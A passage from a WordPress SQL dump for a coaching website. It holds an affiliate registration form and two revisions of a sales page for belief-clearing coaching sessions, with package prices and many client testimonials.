value="Zimbabwe">Zimbabwe</option>\n</select></div>\n</div>\n<div>\n<div></div>\n</div>\n<div></div>\n<div>\n<div></div>\n</div>\n<div>\n<div class="text">\n<div class="text">\n<div>\n\nChoose a Username of approximately 4 to 8 letters. Enter either your SSN or EIN # below.\n\n</div>\n</div>\n</div>\n</div>\n<div class="infusion-field"><label for="inf_other_Username">Username *</label>\n<input id="inf_other_Username" class="infusion-field-input-container" name="inf_other_Username" type="text" placeholder="Username *" /></div>\n<div class="infusion-field"><label for="inf_other_Password">Password *</label>\n<input id="inf_other_Password" class="infusion-field-input-container" name="inf_other_Password" type="password" placeholder="Password *" /></div>\n<div class="infusion-field"><label for="inf_other_RetypePassword">Confirm Password *</label>\n<input id="inf_other_RetypePassword" class="infusion-field-input-container" name="inf_other_RetypePassword" type="password" placeholder="Confirm Password *" /></div>\n<div class="infusion-field"><label for="inf_other_NotifyOnLead">Notify on Lead</label>\n<div class="infusion-radio">\n<div class="options-container"><span class="infusion-option">\n<input id="inf_other_NotifyOnLead_1" name="inf_other_NotifyOnLead" type="radio" value="1" />\n<label for="inf_other_NotifyOnLead_1">Yes</label>\n</span>\n<span class="infusion-option">\n<input id="inf_other_NotifyOnLead_0" name="inf_other_NotifyOnLead" type="radio" value="0" />\n<label for="inf_other_NotifyOnLead_0">No</label>\n</span></div>\n</div>\n</div>\n<div class="infusion-field"><label for="inf_other_NotifyOnSale">Notify on Sale</label>\n<div class="infusion-radio">\n<div class="options-container"><span class="infusion-option">\n<input id="inf_other_NotifyOnSale_1" name="inf_other_NotifyOnSale" type="radio" value="1" />\n<label for="inf_other_NotifyOnSale_1">Yes</label>\n</span>\n<span class="infusion-option">\n<input id="inf_other_NotifyOnSale_0" name="inf_other_NotifyOnSale" type="radio" value="0" />\n<label for="inf_other_NotifyOnSale_0">No</label>\n</span></div>\n</div>\n</div>\n<div class="infusion-field"><label for="inf_field_SSN">SSN (U.S. Residents Only)</label>\n<input id="inf_field_SSN" class="infusion-field-input-container" name="inf_field_SSN" type="text" placeholder="SSN (U.S. Residents Only)" /></div>\n<div class="infusion-field"><label for="inf_custom_EIN">EIN (U.S. Businesses Only)</label>\n<input id="inf_custom_EIN" class="infusion-field-input-container" name="inf_custom_EIN" type="text" placeholder="EIN (U.S. Businesses Only)" /></div>\n<div>\n<div></div>\n</div>\n<div class="infusion-field"><span class="infusion-option">\n<input id="inf_option_ClickhereifyouareaCertifiedClearYourBeliefsCoach" name="inf_option_ClickhereifyouareaCertifiedClearYourBeliefsCoach" type="checkbox" value="1402" />\n<label for="inf_option_ClickhereifyouareaCertifiedClearYourBeliefsCoach">Click here if you are a Certified Clear Your Beliefs Coach</label>\n</span></div>\n<div></div>\n<div>\n<div></div>\n</div>\n<div class="infusion-field"><span class="infusion-option">\n<input id="inf_option_PleaseMailMyCommissionPaymenttothePaypalEmailAddressBelow" checked="checked" name="inf_option_PleaseMailMyCommissionPaymenttothePaypalEmailAddressBelow" type="checkbox" value="976" />\n<label for="inf_option_PleaseMailMyCommissionPaymenttothePaypalEmailAddressBelow">Please Mail My Commission Payment to the Paypal Email Address Below:</label>\n</span></div>\n<div class="infusion-field"><label for="inf_custom_PaypalEmailAddress">Paypal Email Address *</label>\n<input id="inf_custom_PaypalEmailAddress" class="infusion-field-input-container" name="inf_custom_PaypalEmailAddress" type="text" placeholder="Paypal Email Address *" /></div>\n<div>\n<div></div>\n</div>\n<div class="infusion-submit"><button id="recaptcha_3f71c00a94d36f3139b9a849b793215b" class="infusion-recaptcha" type="submit">Register!</button></div>\n</div>\n</form><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode"></script>\n<script type="text/javascript" src="https://beliefcloset.infusionsoft.com/resources/external/recaptcha/production/recaptcha.js?b=1.68.0.179-hf-201712141430"></script>\n<script src="https://www.google.com/recaptcha/api.js?onload=onloadInfusionRecaptchaCallback&render=explicit" async="async" defer="defer"></script>\n<script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/timezone/timezoneInputJs?xid=3f71c00a94d36f3139b9a849b793215b"></script>\n\n</div>', 'Affiliate Area', '', 'inherit', 'open', 'open', '', '928-autosave-v1', '', '', '2018-02-05 20:44:45', '2018-02-06 01:44:45', '', 928, 'http://clearyourbeliefs.com/928-autosave-v1/', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2487, 2, '2018-02-09 19:54:20', '2018-02-10 00:54:20', '<p>[vc_row css=".vc_custom_1491335160850{margin-bottom: 0px !important;}"][vc_column][vc_column_text el_class="site-title-one"]<strong>Get Real Relief from Life’s Problems<br />\n</strong>with Coaching by Lion[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text el_class="desc-one"]<strong><img class="alignleft wp-image-1433 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/09/lion-236x300.jpg" alt="lion" width="236" height="300" />Lion’s expertise is finding (and deleting) core beliefs and patterns deep in the subconscious mind –</strong> the source of the serious problems and issues in your life. He gently guides you through the process of clearing them, once and for all, so they never interfere with your life again.</p>\n<p><strong>Many of us suffer from <em>Developmental Trauma</em></strong> – the bad programming we received when we were children.  Your parents, teachers, and caregivers were likely not models of unconditional love! So you took on beliefs, and conclusions, about yourself and the world. Negative and limiting beliefs at the core of your psyche can result in many different symptoms and conditions:[/vc_column_text][/vc_column][/vc_row][vc_row css=".vc_custom_1491335119652{padding-right: 100px !important;padding-left: 100px !important;}"][vc_column width="1/2"][vc_column_text el_class="desc-one"]</p>\n<ul>\n<li>Low-self-esteem and negative self-talk</li>\n<li>Comparing and judgment of self and others</li>\n<li>Critical or mean inner voices</li>\n<li>Lack of motivation</li>\n<li>Inability to bounce back from failure or challenge</li>\n</ul>\n<p>[/vc_column_text][/vc_column][vc_column width="1/2"][vc_column_text el_class="desc-one"]</p>\n<ul>\n<li>Interference with success in business</li>\n<li>Difficulty with personal and work relationships</li>\n<li>Weight and health problems</li>\n<li>… and other uncomfortable feelings, body sensations, habits, and behaviors.</li>\n</ul>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width="1/4"][/vc_column][vc_column width="1/2"][vc_single_image image="2513" img_size="full" alignment="center" onclick="custom_link" img_link_target="_blank" link="https://beliefcloset.infusionsoft.com/app/manageCart/addProduct?productId=80"][/vc_column][vc_column width="1/4"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text el_class="title-1"]THE PROCESS[/vc_column_text][/vc_column][/vc_row][vc_row css=".vc_custom_1491337395678{margin-top: 0px !important;}"][vc_column][vc_column_text el_class="desc-one"]In each session, Lion will ask you to identify the problem or condition that has been holding you back or interfering with your life.  You will discover the source of the pattern – beliefs and patterns from your childhood that continue to operating in your subconscious mind.</p>\n<p>Lion then guides you through the <em><strong>Clear Beliefs Process</strong></em>, and shows you how to permanently delete the source material from your psyche.</p>\n<p><strong>Once you delete the old pattern, you can then choose what you would prefer, and install that new belief into the same core, at the "causal" level of the mind.  </strong>This give you the opportunity to program your own mind with the best of your wisdom and virtues, based on your own free will choice.  <strong>You decide what you want to believe, in every case.  You become the creator of your own life.</strong>[/vc_column_text][/vc_column][/vc_row][vc_row parallax="content-moving" parallax_image="2512" css=".vc_custom_1491337388303{margin-top: 20px !important;}"][vc_column][vc_empty_space height="300px"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text el_class="title-1"]SPECIAL LIMITED TIME OFFER[/vc_column_text][/vc_column][/vc_row][vc_row css=".vc_custom_1491337395678{margin-top: 0px !important;}"][vc_column][vc_column_text el_class="desc-one"]<strong>Lion''s coaching rate is $300 per hour, with a package of 10 coaching hours available at a discounted rate of $275 per hour.</strong>    The package price is $2,750.  You may use these hours for seven one-hour sessions, or for longer sessions. (After the first hour, time is billed in 15-minute increments).[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width="1/4"][/vc_column][vc_column width="1/2"][vc_single_image image="2513" img_size="full" alignment="center" onclick="custom_link" img_link_target="_blank" link="https://beliefcloset.infusionsoft.com/app/manageCart/addProduct?productId=80"][/vc_column][vc_column width="1/4"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text el_class="title-1"]WHAT PEOPLE ARE SAYING ABOUT LION GOODMAN, P.C.C.[/vc_column_text][/vc_column][/vc_row][vc_row css=".vc_custom_1491337580910{margin-top: 20px !important;}"][vc_column width="1/6"][/vc_column][vc_column width="2/3" el_class="blovk1"][vc_column_text el_class="testi-1"]<em>When I realized I needed support, you took my hand and guided me into the scariest, darkest, and hot-as-hell locations of my inner psyche. As the healing began, I released one obstacle at a time, and received the nourishment needed to heal. Thank you for opening my heart and soul.  </em><br />\n~ Nance B., Spokane, Washington[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336569871{margin-top: 30px !important;}"]<em>Lion taught me and encouraged me to embrace and understand pain and discomfort through mindfulness, meditation, and his Clear Beliefs process. That has allowed me to remove pills from my life</em>.</p>\n<p>~ P. Zeller, Denver, Colorado[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336617630{margin-top: 30px !important;}"]<em>I continue to use the Clear Beliefs process on myself, and with my clients. It continues to grow organically (just as you predicted) from my clients’ individual needs.</em></p>\n<p>~ Melinda Matzell, Therapeutic Yoga Instructor and Therapist[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336633092{margin-top: 30px !important;}"]<em>I’m very excited by how I’ve been using the Clear Beliefs Process. I love integrating your powerful tools in a larger context and flow of practices. I think it’s a huge part of the success my students are experiencing.</em></p>\n<p>~ Tomar Levine, Soul Guidance for Business, New York[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336646140{margin-top: 30px !important;}"]<em>In our very powerful coaching session, I felt a shift both emotionally and physically. What had been stuck inside me my whole life finally came out. I’m still processing what happened, but for maybe the first time in my life, I feel shame-free. I no longer feel the need to justify myself for who I am.” </em>  ~ MRG, Pasadena, California[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336660589{margin-top: 30px !important;}"]<em>Thanks again for a powerful session. That night, my wife and I were planning a trip to Costa Rica. With a more grounded energy inside of me, I had new eyes, and new possibilities opened up. We magically found a way to reduce the cost of the trip by several thousand dollars! It felt like a direct result of the session, with practical intelligence starting to operate more fully inside of me. The session has already paid for itself many times!</em></p>\n<p>~ David Nicol, Ph.D., Sebastopol, California[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336672294{margin-top: 30px !important;}"]<em>I have been living in a completely new space since our work together. The shame has virtually disappeared. I have a new life. I feel free. It’s like the contents in my psyche’s warehouse have been removed and I can now explore this openness. I can think more clearly. I am more alert, more energetic. I no longer feel like I’m dragging a burden around all the time. I am sooo much lighter. I am growing up! It’s rather miraculous. My children have noticed the changes and they are changing too. The tension has been radically reduced. It is a new beginning – a new life!</em></p>\n<p>~ Sherri Pula, Ontario Canada[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336684398{margin-top: 30px !important;}"]<em>I used your technique for getting rid of underlying belief around money. I’m on commission and hadn’t had a sale in 3 months. 18 hours after clearing my beliefs, I got a call from a prospect I had given up on. He said he’s ready to buy!</em></p>\n<p>~ Gene Tress, Ann Arbor, Michigan[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336696821{margin-top: 30px !important;}"]<em>The Clear Beliefs Process is simply the best way I’ve found to permanently remove old troublesome beliefs. The process works even on core beliefs, established in early childhood – the ones that have produced intense suffering for decades. Over the past four months I’ve witnessed amazing changes in myself, and in those I’m working with.</em></p>\n<p>~ Jim Bird, Life Coach, Downingtown, Pennsylvania[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336709999{margin-top: 30px !important;}"]<em>The Clear Beliefs course has been a joy and privilege to attend. I’ve cleared what has kept me stuck from moving forward in my life. The tools have enabled me to take action and get me off my ass and create! It has been a joy and a blessing. As a Licensed Psychological Counselor in private practice, what I’ve learned has brought a new sense of joy and excitement into my work. My clients tell me they love the processes and are excited in the results they are getting – especially the children. I love seeing them reconnect to their joy, happiness and childlike wonder.</em></p>\n<p>~ Deborah Chelette-Wilson, Winnsboro, Texas[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336721668{margin-top: 30px !important;}"]<em>I have used the Clear Beliefs process many times, and find it extremely useful.  It makes belief change much easier than with other processes I have used in the past. It is very powerful. I’ve had some amazing results with it. My old belief outfits are sometimes quite ghastly and unpleasant. My new beliefs feel wonderful, and they are beautiful, shiny, expansive and open.  Thank you very much for developing and sharing such a powerful process.</em></p>\n<p>~ Jaki Kennedy, Kingston Upon Thames, England[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336733101{margin-top: 30px !important;}"]<em>You were the turning point for me. You helped me awaken, and you saw me and believed in me when I was showing up as a shy, confused and sad young woman. I honestly don’t know where I’d be without you. I so appreciate your love, knowledge and mentorship.</em></p>\n<p>~ Sally Hope, Wildheart Revolution, Bozeman, Montana[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336746644{margin-top: 30px !important;}"]<em>The last 40 years of my life were tough – a lot of difficulties and very little joy. I came to the same painful places too often, which left me feeling immense grief, or uncomfortable numbness at best. During our work together, my zest for life began to come back. I am beginning to experience joy and excitement, and to create my life, rather than letting it pass me by. I look forward to the new bright day that is dawning. I am very grateful to you.</em></p>\n<p>~ Monika Jacobson, Stuttgart, Germany[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336769741{margin-top: 30px !important;}"]<em>Lion is one of the most intelligent, caring, creative, and experienced mental health professionals I have ever met. My gratitude cannot be expressed with words.</em></p>\n<p>~ Jeanette Spence, APRN, Columbia, South Carolina[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336780046{margin-top: 30px !important;}"]<em>The Clear Beliefs Process transformed several underlying beliefs which had previously limited me. I gained not only new, more powerful beliefs, but I also learned a process I can use in the future to fine-tune my beliefs anytime in the future.</em></p>\n<p>~ Kathryn P., Summit County, Colorado[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336790325{margin-top: 30px !important;}"]<em>The impact of our work together is still unfolding. My inner child was healed by your loving reflections and the message of protection you delivered. This opened me to move beyond the hurts and harm of the past, and brought new-found awareness.  I feel freed from dragging around garbage bags of weighty stuff, and the radiance of true Beingness that showed up at the end is still with me! I see and feel things coming to me that will propel my growth and movement as a change agent and Light Server. There is no time to lose, it appears. Get on with it, do it now!</em> ~ D.F., Portland, Oregon[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336800668{margin-top: 30px !important;}"]<em>The Clear Beliefs training with Lion is the single best investment I’ve made in my well-being for a very long time. I experienced deep core insights right from the beginning, and in each and every session. As I released old, limiting conditioning and confirmed new, revitalizing beliefs, my optimism, clarity, productivity and finances increased too! If you are ready to address the challenges you are facing and take a stand for having what you want, I cannot recommend his programs more highly.</em></p>\n<p>~ Sandy Kuehl, Des Moines, Iowa[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336812291{margin-top: 30px !important;}"]<em>I use the Clear Beliefs process for myself every week, and I use it with my clients regularly. My whole life is shifting. I used to be miserable because of my inner critic. I am much more generous and forgiving of myself. I now live without the constant judgment and feeling bad about everything. I am cheerful more often, including at home.  I am taking steps that I just couldn’t before and now it seems natural. My heart swells instead of hides and shrivels. That is the best outcome for me because it allows me to move forward. This work is real. It creates positive change. It’s beautiful.</em>  ~ R.T., Denver, Colorado[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336821891{margin-top: 30px !important;}"]<em>There’s something about this process that has made it much easier to let underlying beliefs float to the surface where I can see them for what they are. They seem like separate entities that I can address respectfully, rather than shameful things to avoid.</em></p>\n<p>~ B.L., Paducah, Kentucky[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336832515{margin-top: 30px !important;}"]<em>This belief course was exactly what I had been searching for but couldn’t find. It’s been liberating and enlightening to be able to finally uncover and discover the blocks and beliefs that have been problematic, worrisome, stressful and hindering in many aspects and areas of my life. I appreciate that this is something I can continue to practice on my own, and get excellent results! Thank you!</em></p>\n<p>~ Janna Ekstrom, Bend, Oregon[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336848334{margin-top: 30px !important;}"]<em>In the course we got to witness many people releasing negative beliefs about themselves. You could actually hear their voice change – they sounded lighter, often laughing and giggling like kids! It’s been amazing and inspirational to watch Lion work. In one session he helped the person create a new belief: “I am joyful and my inner child is safe.” It is miraculous to watch the changes from so simple an act.<br />\n</em>~ Thea Deley, Paonia, Colorado[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336857556{margin-top: 30px !important;}"]<em>You have really given me confidence that troublesome beliefs can, in fact, be changed.</em><br />\n~ Julian Graham, London, England[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336869972{margin-top: 30px !important;}"]<em>As a Stress Therapist, I can recommend the Clear Beliefs Process as a first place winner to relieve stress and create a balanced life! I’ve studied cognitive work and believe that this work is much more value for the money – it actually transforms your subconscious mind – which is a rare thing!<br />\n</em>~ Marina Malmberg, Stress Therapist, Sweden[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336878620{margin-top: 30px !important;}"]<em>The Clear Beliefs process is amazing in terms of the results produced in just a few weeks. My core beliefs, which had been troublesome for decades, simply lost their emotional charge — and were replaced by new beliefs that support and thrill me!</em><br />\n~ Jim Bird, Downingtown, PA[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336886556{margin-top: 30px !important;}"]<em>Lion’s voice and manner are reassuring and unflappable.  I was amazed by his ability to support and encourage every client. If one approach did not reach the problem, he shifted to yet another way to look at things. You could hear the change in the participant’s voice when the core belief was reached. Amazing!</em><br />\n~ M.P., Auckland, New Zealand[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336894292{margin-top: 30px !important;}"]<em>The techniques are both fun and powerful. This work will continue to influence how I think and perceive what’s going on in my head – and in my life!</em><br />\n~ L.Z., Paris, France[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336902995{margin-top: 30px !important;}"]<em>My experience has been deep, bittersweet, and liberating. After dis-creating many core beliefs from my early childhood, those belief clusters were gone. Others surfaced, which Lion said was normal, and a part of the process. I will use the Clear Beliefs Process to deal with them, one by one, and I’m confident that I have the tools in hand.<br />\n</em>~ P.P., Boca Raton, Florida[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336911587{margin-top: 30px !important;}"]<em>In terms of change in and for myself, and in terms of time spent, this was about the best investment I’ve ever made in a course (and I have taken many).</em><br />\n~ D.K., Bozeman, Montana[/vc_column_text][/vc_column][vc_column width="1/6"][/vc_column][/vc_row][vc_row css=".vc_custom_1491337857353{margin-top: 30px !important;}"][vc_column width="1/4"][/vc_column][vc_column width="1/2"][vc_single_image image="2513" img_size="full" alignment="center" onclick="custom_link" link="https://beliefcloset.infusionsoft.com/app/manageCart/addProduct?productId=80"][/vc_column][vc_column width="1/4"][/vc_column][/vc_row]</p>\n', 'Coaching with Lion Goodman', '', 'inherit', 'open', 'open', '', '2486-autosave-v1', '', '', '2018-02-09 19:54:20', '2018-02-10 00:54:20', '', 2486, 'http://clearyourbeliefs.com/2486-autosave-v1/', 0, 'revision', '', 0),
(2506, 135, '2017-04-04 14:28:03', '2017-04-04 19:28:03', '[vc_row css=".vc_custom_1491335160850{margin-bottom: 0px !important;}"][vc_column][vc_column_text el_class="site-title-one"]<strong>Get Real Relief from Life’s Problems </strong>with Coaching by Lion[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text el_class="desc-one"]<strong><img class="alignleft wp-image-1433 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/09/lion-236x300.jpg" alt="lion" width="236" height="300" />Lion’s expertise is finding (and deleting) core beliefs deep in your subconscious mind – </strong>beliefs that cause serious trouble in your life. He gently guides you through the process of clearing them, once and for all, so they never interfere with your life again.\r\n\r\n<strong>Many of us suffer from <em>Developmental Trauma</em></strong> – the bad programming we got when we were children.  Your parents, teachers, and caregivers were likely not models of unconditional love! So you took on beliefs, and conclusions, about yourself and the world. Negative and limiting beliefs at the core of your psyche can result in many different symptoms and conditions:[/vc_column_text][/vc_column][/vc_row][vc_row css=".vc_custom_1491335119652{padding-right: 100px !important;padding-left: 100px !important;}"][vc_column width="1/2"][vc_column_text el_class="desc-one"]\r\n<ul>\r\n	<li>Low-self-esteem and negative self-talk</li>\r\n	<li>Comparing and judgment of self and others</li>\r\n	<li>Critical or mean inner voices</li>\r\n	<li>Lack of motivation</li>\r\n	<li>Inability to bounce back from failure or challenge</li>\r\n</ul>\r\n[/vc_column_text][/vc_column][vc_column width="1/2"][vc_column_text el_class="desc-one"]\r\n<ul>\r\n	<li>Interference with success in business</li>\r\n	<li>Difficulty with personal and work relationships</li>\r\n	<li>Weight and health problems</li>\r\n	<li>… and other uncomfortable feelings, body sensations, habits, and behaviors.</li>\r\n</ul>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width="1/4"][/vc_column][vc_column width="1/2"][vc_single_image image="2510" img_size="full" alignment="center" onclick="custom_link" link="https://beliefcloset.infusionsoft.com/app/orderForms/1e28f740-4a29-4ad7-bbe9-cf45a781a354"][/vc_column][vc_column width="1/4"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text el_class="title-1"]THE PROCESS[/vc_column_text][/vc_column][/vc_row][vc_row css=".vc_custom_1491337395678{margin-top: 0px !important;}"][vc_column][vc_column_text el_class="desc-one"]In each session, Lion will ask you to name the problem or condition that has been bugging you or holding you back. With careful questioning, you will discover the source of the pattern – beliefs from your childhood that are still operating in your subconscious mind.\r\n\r\nLion then guides you through the <em><strong>Clear Your Beliefs Process</strong></em>, and shows you how to easily, efficiently, and permanently delete these source materials from your psyche.\r\n\r\n<strong>The next step is to choose what you would rather believe</strong> about yourself, the other person, or the circumstance that created the old belief.  This give you the opportunity to program your own mind with the best of your wisdom and virtues, based on your own free will choice.  <strong>You decide what you want to believe, in every case.  You become the creator of your own life.</strong>[/vc_column_text][/vc_column][/vc_row][vc_row parallax="content-moving" parallax_image="2512" css=".vc_custom_1491337388303{margin-top: 20px !important;}"][vc_column][vc_empty_space height="300px"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text el_class="title-1"]SPECIAL LIMITED TIME OFFER[/vc_column_text][/vc_column][/vc_row][vc_row css=".vc_custom_1491337395678{margin-top: 0px !important;}"][vc_column][vc_column_text el_class="desc-one"]<strong>For a limited time, Lion is offering a package of 7 coaching hours at his lowest discounted rate of $175 per hour.</strong>  This is a 30% savings from his usual price of $250 per hour.  The package price is only $1,225. You save $525.\r\n\r\nYou may use these hours for seven one-hour sessions, or for longer sessions (after the first hour, time is billed in 15-minute increments, so your session can be 1.25, 1.5, 1.75, or 2 hours long).[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width="1/4"][/vc_column][vc_column width="1/2"][vc_single_image image="2510" img_size="full" alignment="center" onclick="custom_link" link="https://beliefcloset.infusionsoft.com/app/orderForms/1e28f740-4a29-4ad7-bbe9-cf45a781a354"][/vc_column][vc_column width="1/4"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text el_class="title-1"]WHAT PEOPLE ARE SAYING ABOUT LION GOODMAN, P.C.C.[/vc_column_text][/vc_column][/vc_row][vc_row css=".vc_custom_1491337580910{margin-top: 20px !important;}"][vc_column width="1/6"][/vc_column][vc_column width="2/3" el_class="blovk1"][vc_column_text el_class="testi-1"]<em>When I realized I needed support, you took my hand and guided me into the scariest, darkest, and hot-as-hell locations of my inner psyche. As the healing began, I released one obstacle at a time, and received the nourishment needed to heal. Thank you for opening my heart and soul.  </em>\r\n~ Nance B., Spokane, Washington[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336569871{margin-top: 30px !important;}"]<em>Lion taught me and encouraged me to embrace and understand pain and discomfort through mindfulness, meditation, and his Clear Beliefs process. That has allowed me to remove pills from my life</em>.\r\n\r\n~ P. Zeller, Denver, Colorado[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336617630{margin-top: 30px !important;}"]<em>I continue to use the Clear Beliefs process on myself, and with my clients. It continues to grow organically (just as you predicted) from my clients’ individual needs.</em>\r\n\r\n~ Melinda Matzell, Therapeutic Yoga Instructor and Therapist[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336633092{margin-top: 30px !important;}"]<em>I’m very excited by how I’ve been using the Clear Beliefs Process. I love integrating your powerful tools in a larger context and flow of practices. I think it’s a huge part of the success my students are experiencing.</em>\r\n\r\n~ Tomar Levine, Soul Guidance for Business, New York[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336646140{margin-top: 30px !important;}"]<em>In our very powerful coaching session, I felt a shift both emotionally and physically. What had been stuck inside me my whole life finally came out. I’m still processing what happened, but for maybe the first time in my life, I feel shame-free. I no longer feel the need to justify myself for who I am.” </em>  ~ MRG, Pasadena, California[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336660589{margin-top: 30px !important;}"]<em>Thanks again for a powerful session. That night, my wife and I were planning a trip to Costa Rica. With a more grounded energy inside of me, I had new eyes, and new possibilities opened up. We magically found a way to reduce the cost of the trip by several thousand dollars! It felt like a direct result of the session, with practical intelligence starting to operate more fully inside of me. The session has already paid for itself many times!</em>\r\n\r\n~ David Nicol, Ph.D., Sebastopol, California[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336672294{margin-top: 30px !important;}"]<em>I have been living in a completely new space since our work together. The shame has virtually disappeared. I have a new life. I feel free. It’s like the contents in my psyche’s warehouse have been removed and I can now explore this openness. I can think more clearly. I am more alert, more energetic. I no longer feel like I’m dragging a burden around all the time. I am sooo much lighter. I am growing up! It’s rather miraculous. My children have noticed the changes and they are changing too. The tension has been radically reduced. It is a new beginning – a new life!</em>\r\n\r\n~ Sherri Pula, Ontario Canada[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336684398{margin-top: 30px !important;}"]<em>I used your technique for getting rid of underlying belief around money. I’m on commission and hadn’t had a sale in 3 months. 18 hours after clearing my beliefs, I got a call from a prospect I had given up on. He said he’s ready to buy!</em>\r\n\r\n~ Gene Tress, Ann Arbor, Michigan[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336696821{margin-top: 30px !important;}"]<em>The Clear Beliefs Process is simply the best way I’ve found to permanently remove old troublesome beliefs. The process works even on core beliefs, established in early childhood – the ones that have produced intense suffering for decades. Over the past four months I’ve witnessed amazing changes in myself, and in those I’m working with.</em>\r\n\r\n~ Jim Bird, Life Coach, Downingtown, Pennsylvania[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336709999{margin-top: 30px !important;}"]<em>The Clear Beliefs course has been a joy and privilege to attend. I’ve cleared what has kept me stuck from moving forward in my life. The tools have enabled me to take action and get me off my ass and create! It has been a joy and a blessing. As a Licensed Psychological Counselor in private practice, what I’ve learned has brought a new sense of joy and excitement into my work. My clients tell me they love the processes and are excited in the results they are getting – especially the children. I love seeing them reconnect to their joy, happiness and childlike wonder.</em>\r\n\r\n~ Deborah Chelette-Wilson, Winnsboro, Texas[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336721668{margin-top: 30px !important;}"]<em>I have used the Clear Beliefs process many times, and find it extremely useful.  It makes belief change much easier than with other processes I have used in the past. It is very powerful. I’ve had some amazing results with it. My old belief outfits are sometimes quite ghastly and unpleasant. My new beliefs feel wonderful, and they are beautiful, shiny, expansive and open.  Thank you very much for developing and sharing such a powerful process.</em>\r\n\r\n~ Jaki Kennedy, Kingston Upon Thames, England[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336733101{margin-top: 30px !important;}"]<em>You were the turning point for me. You helped me awaken, and you saw me and believed in me when I was showing up as a shy, confused and sad young woman. I honestly don’t know where I’d be without you. I so appreciate your love, knowledge and mentorship.</em>\r\n\r\n~ Sally Hope, Wildheart Revolution, Bozeman, Montana[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336746644{margin-top: 30px !important;}"]<em>The last 40 years of my life were tough – a lot of difficulties and very little joy. I came to the same painful places too often, which left me feeling immense grief, or uncomfortable numbness at best. During our work together, my zest for life began to come back. I am beginning to experience joy and excitement, and to create my life, rather than letting it pass me by. I look forward to the new bright day that is dawning. I am very grateful to you.</em>\r\n\r\n~ Monika Jacobson, Stuttgart, Germany[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336769741{margin-top: 30px !important;}"]<em>Lion is one of the most intelligent, caring, creative, and experienced mental health professionals I have ever met. My gratitude cannot be expressed with words.</em>\r\n\r\n~ Jeanette Spence, APRN, Columbia, South Carolina[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336780046{margin-top: 30px !important;}"]<em>The Clear Beliefs Process transformed several underlying beliefs which had previously limited me. I gained not only new, more powerful beliefs, but I also learned a process I can use in the future to fine-tune my beliefs anytime in the future.</em>\r\n\r\n~ Kathryn P., Summit County, Colorado[/vc_column_text][vc_column_text el_class="testi-1" css=".vc_custom_1491336790325{margin-top: 30px !important;}"]<em>The impact of our work together is still unfolding. My inner child was healed by your loving reflections and the message of protection you delivered. This opened me to move beyond the hurts and harm of the past, and brought new-found awareness.  I feel freed from dragging around garbage bags of weighty stuff, and the radiance of true Beingness that showed up at the end is still with me! I see and feel things coming to me that will propel my growth and movement as a change agent and Light Server. There is no time to 